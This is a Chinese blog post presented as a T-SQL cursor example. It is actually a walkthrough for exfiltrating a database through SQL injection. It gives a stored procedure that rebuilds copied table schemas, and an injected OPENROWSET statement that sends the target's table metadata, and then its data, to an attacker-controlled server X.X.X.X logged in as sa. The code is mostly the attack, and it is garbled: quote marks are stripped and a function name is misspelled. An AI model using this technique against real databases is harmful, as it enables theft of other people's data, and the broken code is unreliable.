痛苦的信仰

文章没有什么亮点，主要是希望方便以及做个T-SQL游标使用的例子供大家参考。

假设我们控制的SQL服务器叫X.X.X.X，我们注入一个目标，可以openrowset,对系统表有select权限

连接查询分析器建立扩展储存：

CREATE PROCEDURE view_open_table
AS
BEGIN
IF (select count(*) from sysobjects where name=open_table)=0
BEGIN
print No table [open_table] here,I will create it... ;
create table open_table(table_name varchar(255),column_name varchar(255),column_type varchar(255),column_length int);
END

ELSE

BEGIN
IF (select count(*) from open_table)>0
BEGIN
DECLARE @stmt varchar(1024),@t_name varchar(255),@c_name varchar(255),@c_type varchar(255),@c_length int;
DECLARE cur cursor FOR select table_name,column_name,column_type,column_length from open_table;
OPEN cur;
FETCH NEXT FROM cur INTO @t_name,@c_name,@c_type,@c_length;
print Creating table .....;
SET @stmt = CREATE TABLE +@t_name + (;
WHILE @@fetch_status=0
BEGIN
IF (@c_type = nvarchar OR @c_type = varchar)
BEGIN SET @stmt = @stmt + @c_name + + @c_type + ( + CAST(@c_length AS varchar(255)) + ); END;
ELSE BEGIN SET @stmt = @stmt + @c_name + + @c_type; END;

FETCH NEXT FROM cur INTO @t_name,@c_name,@c_type,@c_length;

IF @@fetch_status!=0 BREAK;
SET @stmt = @stmt + ,;
END
CLOSE cur;
DEALLOCATE cur;
SET @stmt = @stmt + );
EXEC(@stmt);
END

END
END;

这段代码是初始化环境的，建立一个叫open_table的表，结构如下:

create table open_table(table_name varchar(255),column_name varchar(255),column_type varchar(255),column_length int);
把扩展储存的代码注释掉，执行EXEC view_open_table完成初始化，在注入的机器，当然，任何可以执行对方SQL的地方都可以执行：

insert into openroset(sqloledb,server=X.X.X.X;uid=sa;pwd=123,select * from open_table) select t.name as table_name,c.name as column_name,ty.name as column_type,c.length as column_length from master.dbo.sysobjects t,master.dbo.syscolumns c,master.dbo.systypes ty where t.name=cmd and t.xtype=char(85) and t.status>0 and t.id=c.id and c.xtype=ty.xtype and ty.name not in(sysname)

此时你的数据库里面已经包含了表cmd的结构：

当然是建立和对方一摸一样表，不过这个不用你操心了，再次执行EXEC view_open_table，看到creating table....就开始建表了，执行完毕你已经得到了一个和对方结构一摸一样，名字也一样的表。下面再open传回你要的数据就OK了